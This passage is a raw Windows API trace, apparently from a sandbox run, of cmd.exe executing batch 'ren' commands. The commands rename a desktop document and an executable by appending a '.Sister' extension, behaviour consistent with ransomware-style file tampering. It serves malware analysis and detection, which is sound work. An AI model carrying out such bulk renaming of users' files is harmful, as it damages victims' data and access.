lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0144.199] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0144.199] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.199] GetFileType (hFile=0x50) returned 0x2 [0144.199] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.199] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0144.201] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.201] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0144.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.210] GetFileType (hFile=0x50) returned 0x2 [0144.211] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.211] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0144.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.215] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9341680*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9341680*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0144.268] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"GQcSsii2kuOdN456.odt.Sister\" \"GQcSsii2kuOdN456.bat\" ") returned 54 [0144.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.268] GetFileType (hFile=0x50) returned 0x2 [0144.269] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.269] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0144.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.274] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0144.285] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0144.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.285] GetFileType (hFile=0x50) returned 0x2 [0144.285] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.285] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0144.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.358] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0144.397] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0144.398] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0144.399] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0144.399] malloc (_Size=0xffce) returned 0x21ed913ff00 [0144.400] ??_V@YAXPEAX@Z () returned 0x21ed913ff00 [0144.400] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0144.401] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0144.401] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0144.401] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0144.401] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0144.401] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0144.401] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0144.401] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0144.401] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0144.401] ??_V@YAXPEAX@Z () returned 0x1 [0144.401] GetProcessHeap () returned 0x21ed8c70000 [0144.401] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d45250 [0144.401] GetProcessHeap () returned 0x21ed8c70000 [0144.401] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45250, Size=0x7c) returned 0x21ed8d45250 [0144.401] GetProcessHeap () returned 0x21ed8c70000 [0144.401] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45250) returned 0x7c [0144.401] GetProcessHeap () returned 0x21ed8c70000 [0144.401] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x84) returned 0x21ed8d452e0 [0144.401] GetProcessHeap () returned 0x21ed8c70000 [0144.401] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d45ef0 [0144.401] GetProcessHeap () returned 0x21ed8c70000 [0144.401] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45ef0, Size=0x7c) returned 0x21ed8d45ef0 [0144.401] GetProcessHeap () returned 0x21ed8c70000 [0144.401] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45ef0) returned 0x7c [0144.401] malloc (_Size=0xffce) returned 0x21ed913ff00 [0144.401] ??_V@YAXPEAX@Z () returned 0x21ed913ff00 [0144.401] GetProcessHeap () returned 0x21ed8c70000 [0144.401] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d432d0 [0144.401] GetProcessHeap () returned 0x21ed8c70000 [0144.401] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5b2b0 [0144.401] _wcsicmp (_String1="GQcSsii2kuOdN456.odt", _String2=".") returned 57 [0144.402] _wcsicmp (_String1="GQcSsii2kuOdN456.odt", _String2="..") returned 57 [0144.402] GetFileAttributesW (lpFileName="GQcSsii2kuOdN456.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\gqcssii2kuodn456.odt")) returned 0x20 [0144.402] GetProcessHeap () returned 0x21ed8c70000 [0144.402] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9341880 [0144.403] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9341890 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0144.403] SetErrorMode (uMode=0x0) returned 0x0 [0144.403] SetErrorMode (uMode=0x1) returned 0x0 [0144.403] GetFullPathNameW (in: lpFileName="GQcSsii2kuOdN456.odt", nBufferLength=0x7fe7, lpBuffer=0x21ed913ff00, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\GQcSsii2kuOdN456.odt", lpFilePart=0xa6cf4fd660*="GQcSsii2kuOdN456.odt") returned 0x2c [0144.404] SetErrorMode (uMode=0x0) returned 0x1 [0144.404] GetProcessHeap () returned 0x21ed8c70000 [0144.404] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5e100 [0144.404] _wcsicmp (_String1="GQcSsii2kuOdN456.odt", _String2=".") returned 57 [0144.404] _wcsicmp (_String1="GQcSsii2kuOdN456.odt", _String2="..") returned 57 [0144.404] GetFileAttributesW (lpFileName="GQcSsii2kuOdN456.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\gqcssii2kuodn456.odt")) returned 0x20 [0144.404] ??_V@YAXPEAX@Z () returned 0x1 [0144.404] malloc (_Size=0xffce) returned 0x21ed913ff00 [0144.404] ??_V@YAXPEAX@Z () returned 0x21ed913ff00 [0144.404] malloc (_Size=0xffce) returned 0x21ed914fee0 [0144.404] ??_V@YAXPEAX@Z () returned 0x21ed914fee0 [0144.405] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\GQcSsii2kuOdN456.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\gqcssii2kuodn456.odt")) returned 0x20 [0144.405] malloc (_Size=0xffce) returned 0x21ed915fec0 [0144.405] ??_V@YAXPEAX@Z () returned 0x21ed915fec0 [0144.405] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\GQcSsii2kuOdN456.odt", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5b2c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5b2c0) returned 0x21ed8d42d90 [0144.405] malloc (_Size=0xffce) returned 0x21ed916fea0 [0144.406] ??_V@YAXPEAX@Z () returned 0x21ed916fea0 [0144.406] ??_V@YAXPEAX@Z () returned 0x1 [0144.406] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\GQcSsii2kuOdN456.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\gqcssii2kuodn456.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\GQcSsii2kuOdN456.odt.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\gqcssii2kuodn456.odt.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0144.407] FindNextFileW (in: hFindFile=0x21ed8d42d90, lpFindFileData=0x21ed8d5b2c0 | out: lpFindFileData=0x21ed8d5b2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa5c950, ftCreationTime.dwHighDateTime=0x1d5e5cd, ftLastAccessTime.dwLowDateTime=0xecd45db0, ftLastAccessTime.dwHighDateTime=0x1d5efb4, ftLastWriteTime.dwLowDateTime=0xecd45db0, ftLastWriteTime.dwHighDateTime=0x1d5efb4, nFileSizeHigh=0x0, nFileSizeLow=0x6a6f, dwReserved0=0x0, dwReserved1=0x0, cFileName="GQcSsii2kuOdN456.odt", cAlternateFileName="")) returned 0 [0144.408] GetLastError () returned 0x12 [0144.408] FindClose (in: hFindFile=0x21ed8d42d90 | out: hFindFile=0x21ed8d42d90) returned 1 [0144.409] ??_V@YAXPEAX@Z () returned 0x1 [0144.409] ??_V@YAXPEAX@Z () returned 0x1 [0144.410] ??_V@YAXPEAX@Z () returned 0x1 [0144.411] ??_V@YAXPEAX@Z () returned 0x1 [0144.411] GetProcessHeap () returned 0x21ed8c70000 [0144.411] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43750 [0144.411] GetProcessHeap () returned 0x21ed8c70000 [0144.411] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95920, Size=0x16) returned 0x21ed8c95a00 [0144.411] GetProcessHeap () returned 0x21ed8c70000 [0144.411] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95a00) returned 0x16 [0144.411] GetProcessHeap () returned 0x21ed8c70000 [0144.411] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0144.411] GetProcessHeap () returned 0x21ed8c70000 [0144.411] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0144.411] GetProcessHeap () returned 0x21ed8c70000 [0144.411] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d45f80 [0144.411] GetProcessHeap () returned 0x21ed8c70000 [0144.411] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45f80, Size=0xb2) returned 0x21ed8d45f80 [0144.411] GetProcessHeap () returned 0x21ed8c70000 [0144.411] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45f80) returned 0xb2 [0144.411] GetProcessHeap () returned 0x21ed8c70000 [0144.411] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d60db0 [0144.411] GetProcessHeap () returned 0x21ed8c70000 [0144.411] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d60db0, Size=0x30) returned 0x21ed8d60db0 [0144.411] GetProcessHeap () returned 0x21ed8c70000 [0144.411] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d60db0) returned 0x30 [0144.411] GetProcessHeap () returned 0x21ed8c70000 [0144.411] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d60df0 [0144.411] malloc (_Size=0x1ff9c) returned 0x21ed913ff00 [0144.414] GetProcessHeap () returned 0x21ed8c70000 [0144.414] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d48050 [0144.414] GetProcessHeap () returned 0x21ed8c70000 [0144.414] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8d46c10 [0144.414] ??_V@YAXPEAX@Z () returned 0x1 [0144.416] malloc (_Size=0x1ff9c) returned 0x21ed913ff00 [0144.418] GetProcessHeap () returned 0x21ed8c70000 [0144.418] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d46cd0 [0144.418] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed913ff00, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0144.418] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d45330, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d43690 [0144.418] FindClose (in: hFindFile=0x21ed8d43690 | out: hFindFile=0x21ed8d43690) returned 1 [0144.418] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d45330, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d439f0 [0144.419] FindClose (in: hFindFile=0x21ed8d439f0 | out: hFindFile=0x21ed8d439f0) returned 1 [0144.419] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x80aea0ab, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x80aea0ab, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d45330, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d434b0 [0144.419] FindClose (in: hFindFile=0x21ed8d434b0 | out: hFindFile=0x21ed8d434b0) returned 1 [0144.419] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x80aea0ab, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x80aea0ab, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d45330, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0144.419] malloc (_Size=0x1ff9c) returned 0x21ed915feb0 [0144.419] ??_V@YAXPEAX@Z () returned 0x21ed915feb0 [0144.420] GetProcessHeap () returned 0x21ed8c70000 [0144.420] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d45370 [0144.420] ??_V@YAXPEAX@Z () returned 0x1 [0144.420] ??_V@YAXPEAX@Z () returned 0x1 [0144.421] GetProcessHeap () returned 0x21ed8c70000 [0144.421] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d60df0, Size=0x490) returned 0x21ed8d60df0 [0144.421] GetProcessHeap () returned 0x21ed8c70000 [0144.421] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d60df0) returned 0x490 [0144.422] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0144.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.422] GetFileType (hFile=0x50) returned 0x2 [0144.422] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.422] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0144.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.427] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0144.433] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0144.433] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0144.433] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0144.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.433] GetFileType (hFile=0x50) returned 0x2 [0144.433] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.433] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0144.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.466] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0144.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.469] GetFileType (hFile=0x50) returned 0x2 [0144.469] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.469] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0144.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.470] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d60dc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d60dc0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0144.472] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0144.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.472] GetFileType (hFile=0x50) returned 0x2 [0144.472] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.472] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0144.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.473] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0144.485] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0144.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.485] GetFileType (hFile=0x50) returned 0x2 [0144.485] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.485] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0144.488] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.488] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0144.493] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0144.505] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0144.505] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0144.506] malloc (_Size=0xffce) returned 0x21ed913ff00 [0144.507] ??_V@YAXPEAX@Z () returned 0x21ed913ff00 [0144.508] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0144.508] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0144.508] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0144.508] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0144.508] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0144.508] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0144.508] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0144.508] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0144.508] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0144.508] ??_V@YAXPEAX@Z () returned 0x1 [0144.508] GetProcessHeap () returned 0x21ed8c70000 [0144.508] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d46050 [0144.508] GetProcessHeap () returned 0x21ed8c70000 [0144.508] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d46050, Size=0x130) returned 0x21ed8d46050 [0144.508] GetProcessHeap () returned 0x21ed8c70000 [0144.508] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d46050) returned 0x130 [0144.508] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.508] malloc (_Size=0xffce) returned 0x21ed913ff00 [0144.508] ??_V@YAXPEAX@Z () returned 0x21ed913ff00 [0144.508] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.508] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed913ff00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0144.510] ??_V@YAXPEAX@Z () returned 0x1 [0144.510] GetProcessHeap () returned 0x21ed8c70000 [0144.510] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d46190 [0144.510] GetProcessHeap () returned 0x21ed8c70000 [0144.510] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d462d0 [0144.510] GetProcessHeap () returned 0x21ed8c70000 [0144.510] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d462d0, Size=0x130) returned 0x21ed8d462d0 [0144.510] GetProcessHeap () returned 0x21ed8c70000 [0144.510] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d462d0) returned 0x130 [0144.510] malloc (_Size=0xffce) returned 0x21ed913ff00 [0144.510] ??_V@YAXPEAX@Z () returned 0x21ed913ff00 [0144.510] GetProcessHeap () returned 0x21ed8c70000 [0144.510] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d42df0 [0144.510] GetProcessHeap () returned 0x21ed8c70000 [0144.510] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5b790 [0144.510] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0144.510] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0144.510] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0144.510] GetLastError () returned 0x2 [0144.510] GetProcessHeap () returned 0x21ed8c70000 [0144.510] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9351870 [0144.510] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9351880 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0144.510] SetErrorMode (uMode=0x0) returned 0x0 [0144.511] SetErrorMode (uMode=0x1) returned 0x0 [0144.511] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed913ff00, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0144.511] SetErrorMode (uMode=0x0) returned 0x1 [0144.511] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0144.511] GetProcessHeap () returned 0x21ed8c70000 [0144.511] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5c3c0 [0144.511] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0144.511] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0144.511] 